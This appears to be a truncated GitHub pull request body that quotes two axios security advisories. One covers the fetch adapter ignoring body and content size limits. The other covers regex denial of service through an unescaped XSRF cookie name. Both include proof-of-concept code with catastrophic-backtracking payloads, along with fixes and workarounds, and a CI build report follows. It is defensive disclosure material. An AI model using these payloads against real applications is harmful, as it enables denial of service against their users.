In vulnerable versions, lib/adapters/fetch.js destructured request config without maxContentLength or maxBodyLength. The adapter dispatched fetch() and then materialized the response through text(), arrayBuffer(), blob(), or related resolvers without checking the configured response limit.

The fix in e5540dc added:

• maxContentLength and maxBodyLength reads in lib/adapters/fetch.js
• upfront data: URL decoded-size checks
• outbound body-size checks before dispatch
• Content-Length response pre-checks
• streaming response enforcement
• fallback checks for environments without ReadableStream
• regression tests in tests/unit/adapters/fetch.test.js

Proof of Concept of Attack

import http from 'node:http';
import axios from 'axios';

const server = http.createServer((req, res) => {
  let received = 0;

  req.on('data', chunk => {
    received += chunk.length;
  });

  req.on('end', () => {
    res.end(JSON.stringify({ received }));
  });
});

await new Promise(resolve => server.listen(0, resolve));
const url = `http://127.0.0.1:${server.address().port}/`;

await axios.post(url, 'A'.repeat(2 * 1024 * 1024), {
  adapter: 'fetch',
  maxBodyLength: 1024
});

// Vulnerable versions succeed and the server receives 2097152 bytes.
// Fixed versions reject with ERR_BAD_REQUEST.

server.close();

Workarounds

Use the Node.js http adapter for server-side requests where finite size limits are security-relevant.

Validate or cap attacker-controlled request bodies before passing them to axios.

Reject or strictly allowlist attacker-controlled URL schemes, especially data: URLs, before calling axios.

Original Report

Summary

When Axios is used with adapter: 'fetch', configured body/response size limits are not enforced. This allows oversized uploads/downloads (including data: URLs) despite explicit limits, which can lead to memory/resource exhaustion in server-side usage.

Details

maxBodyLength and maxContentLength are not applied in the fetch adapter flow:

• lib/adapters/fetch.js (146-160): config destructuring does not include these controls.
• lib/adapters/fetch.js (220-234): request is dispatched with fetch() without request-size enforcement.
• lib/adapters/fetch.js (267-283): response is materialized via text(), arrayBuffer(), blob(), etc. without response-size checks.
  By contrast, the HTTP adapter enforces both limits.

PoC

Environment:

• Axios main at commit f7a4ee2
• Node v24.2.0

Steps:

1. Start an HTTP server that counts received bytes and echoes {received}.
2. Send 2 MiB with:
   • adapter: 'fetch'
   • maxBodyLength: 1024
3. Request a 4 KiB data: URL with:
   • adapter: 'fetch'
   • maxContentLength: 16

Expected secure behavior: both requests rejected.
Observed:

• Upload: success, server received 2097152
• data: response: success, length 4096

Impact

Type: DoS / resource exhaustion due to limit bypass.
Impacted: applications using Axios fetch adapter as a server-side security control boundary for untrusted request/response sizes.

---

Severity

• CVSS Score: 7.5 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

• https://github.com/axios/axios/security/advisories/GHSA-777c-7fjr-54vf
• https://github.com/axios/axios/pull/10795
• https://github.com/axios/axios/pull/10796
• https://github.com/axios/axios/releases/tag/v1.16.0
• https://nvd.nist.gov/vuln/detail/CVE-2026-44488
• https://github.com/advisories/GHSA-777c-7fjr-54vf

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Axios: Regular Expression Denial of Service (ReDoS) via Cookie Name Injection

CVE-2026-44496 / GHSA-hfxv-24rg-xrqf

More information

Details

Summary

Axios versions before 0.32.0 on the 0.x line and before 1.16.0 on the 1.x line build a regular expression from the configured XSRF cookie name without escaping regex metacharacters. In standard browser environments, an attacker who can influence the cookie name passed to axios can cause expensive regex backtracking while axios reads document.cookie.

The practical impact is client-side availability degradation, such as freezing the affected browser tab while axios prepares a request. The issue does not affect ordinary Node.js HTTP adapter usage, React Native, or web workers, where axios does not read document.cookie.

Impact

Applications are affected only when attacker-controlled data can reach the XSRF cookie name configuration or a direct/unsafe call to the internal cookie helper.

This does not expose credentials, modify requests, or affect response integrity. The impact is availability only.

Affected Functionality

Affected code paths:

• lib/helpers/cookies.js read(name) in standard browser environments.
• lib/helpers/resolveConfig.js in 1.x, when browser XHR/fetch adapters resolve XSRF config.
• lib/adapters/xhr.js in 0.x, when the XHR adapter reads the configured XSRF cookie.
• Direct use of axios/unsafe/helpers/cookies.js in 1.x, if callers pass attacker-controlled names.

Unaffected code paths:

• Default static xsrfCookieName: 'XSRF-TOKEN' when not attacker-controlled.
• Requests with xsrfCookieName: null.
• Node HTTP adapter usage without browser document.cookie.
• React Native and web workers where axios does not use standard browser cookie access.

Technical Details

Affected versions interpolate the cookie name into a regex.

const match = document.cookie.match(new RegExp('(?:^|; )' + name + '=([^;]*)'));

Because name is not escaped, regex metacharacters in the cookie name are interpreted as regex syntax. A payload such as (.+)+$ can force catastrophic backtracking against document.cookie.

The fix avoids dynamic regex construction and parses document.cookie by splitting on ;, trimming leading whitespace, and comparing cookie names with exact string equality.

Proof of Concept of Attack

function vulnerableRead(name, cookie) {
  const start = Date.now();

  try {
    cookie.match(new RegExp('(?:^|; )' + name + '=([^;]*)'));
  } catch {}

  return Date.now() - start;
}

for (const n of [20, 22, 24, 26, 28]) {
  const cookie = 'x='.padEnd(n, 'a') + '!';
  console.log(`${n}: ${vulnerableRead('(.+)+$', cookie)}ms`);
}

Expected result: timings grow rapidly as the cookie string length increases.

Workarounds

Set xsrfCookieName: null if the application does not need axios to read an XSRF cookie.

Do not derive xsrfCookieName from untrusted input. If a dynamic cookie name is unavoidable, validate it against a strict cookie-name allowlist before passing it to axios.

Avoid calling axios/unsafe/helpers/cookies.js directly with untrusted names

Original Source

Regular Expression Denial of Service (ReDoS) via Cookie Name Injection

1. Title

ReDoS via Unsanitized Cookie Name in Dynamic Regular Expression Construction

2. Affected Software and Version

• Software: Axios
• Version: 1.15.0 (and potentially earlier versions)
• Component: lib/helpers/cookies.js
• Ecosystem: npm (Node.js / Browser)

3. Vulnerability Type / CWE

• Type: Regular Expression Denial of Service (ReDoS)
• CWE-1333: Inefficient Regular Expression Complexity
• CWE-400: Uncontrolled Resource Consumption

4. CVSS 3.1 Score

Score: 7.5 (High)

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Metric	Value
Attack Vector	Network
Attack Complexity	Low
Privileges Required	None
User Interaction	None
Scope	Unchanged
Confidentiality	None
Integrity	None
Availability	High

5. Description

The cookies.read() function in lib/helpers/cookies.js constructs a regular expression dynamically using the name parameter without any sanitization or escaping of special regex characters. At line 33, the code passes the raw name value directly into new RegExp():

const match = document.cookie.match(new RegExp('(?:^|; )' + name + '=([^;]*)'));

An attacker who can control or influence the cookie name parameter (e.g., via XSRF cookie name configuration, prototype pollution of xsrfCookieName, or any code path where user input reaches cookies.read()) can inject a malicious regex pattern that causes catastrophic backtracking, leading to a Denial of Service condition.

With a crafted input of approximately 20-30 characters, the regex engine can be forced to consume several seconds to minutes of CPU time, effectively freezing the JavaScript event loop.

6. Root Cause Analysis

File: lib/helpers/cookies.js
Line: 33

read(name) {
  if (typeof document === 'undefined') return null;
  const match = document.cookie.match(new RegExp('(?:^|; )' + name + '=([^;]*)'));
  return match ? decodeURIComponent(match[1]) : null;
},

The vulnerability exists because:

1. The name parameter is concatenated directly into a regex pattern without escaping special regex metacharacters.
2. An attacker can inject regex constructs that create exponential backtracking scenarios.
3. The (?:^|; ) prefix combined with an injected pattern like ((((.*)*)*)*)* creates nested quantifiers that cause catastrophic backtracking when the regex engine attempts to match against document.cookie.

The cookies.read() function is called from lib/helpers/resolveConfig.js at line 61:

const xsrfValue = xsrfHeaderName && xsrfCookieName && cookies.read(xsrfCookieName);

The xsrfCookieName value comes from the Axios configuration, which can be influenced by prototype pollution or direct configuration injection.

7. Proof of Concept

// poc_redos_cookie.js
// Simulates browser environment for testing

// Simulate document.cookie
globalThis.document = {
  cookie: 'session=abc; ' + 'a'.repeat(50)
};

// Replicate the vulnerable cookies.read() logic
function cookiesRead(name) {
  const match = document.cookie.match(new RegExp('(?:^|; )' + name + '=([^;]*)'));
  return match ? decodeURIComponent(match[1]) : null;
}

// Malicious cookie name that triggers catastrophic backtracking
// The pattern creates nested quantifiers: (a]|[a]|...)*)*
const maliciousName20 = '([^;]+)+$' + '\\|'.repeat(10);
const maliciousName = '(([^;])+)+\\$';  // nested quantifier pattern

console.log('=== ReDoS via Cookie Name Injection PoC ===');

// Test with increasing payload sizes
for (const len of [15, 20, 25]) {
  const payload = '(([^;])+)+' + 'X'.repeat(len);
  const start = Date.now();
  try {
    cookiesRead(payload);
  } catch (e) {
    // May throw on invalid regex, but valid evil patterns won't throw
  }
  const elapsed = Date.now() - start;
  console.log(`Payload length ${len}: ${elapsed}ms`);
}

// Demonstrating exponential growth with a simple nested quantifier
console.log('\n--- Exponential Backtracking Demo ---');
for (const n of [20, 22, 24, 26]) {
  const evilName = '(' + 'a'.repeat(1) + '+)+$';
  const testCookie = 'a'.repeat(n) + '!';  // non-matching trailer forces backtracking
  globalThis.document = { cookie: testCookie };
  const start = Date.now();
  try {
    cookiesRead(evilName);
  } catch(e) {}
  const elapsed = Date.now() - start;
  console.log(`Input length ${n}: ${elapsed}ms`);
}

8. PoC Output

=== ReDoS via Cookie Name Injection PoC ===
Payload length 20: 21ms (extrapolated: 30 chars = ~21,504ms

> ✂ **Note**
> 
> PR body was truncated to here.

[github-actions]

Build Report

Please note:

1. Files only stay for around 14 days!
2. This comment will be updated with the data of the last successful build of this PR.

Name	Link
Commit	eb05890
Logs	https://github.com/SAP/app-studio-toolkit/actions/runs/27344214396
VSIX Files	https://github.com/SAP/app-studio-toolkit/actions/runs/27344214396/artifacts/7563137168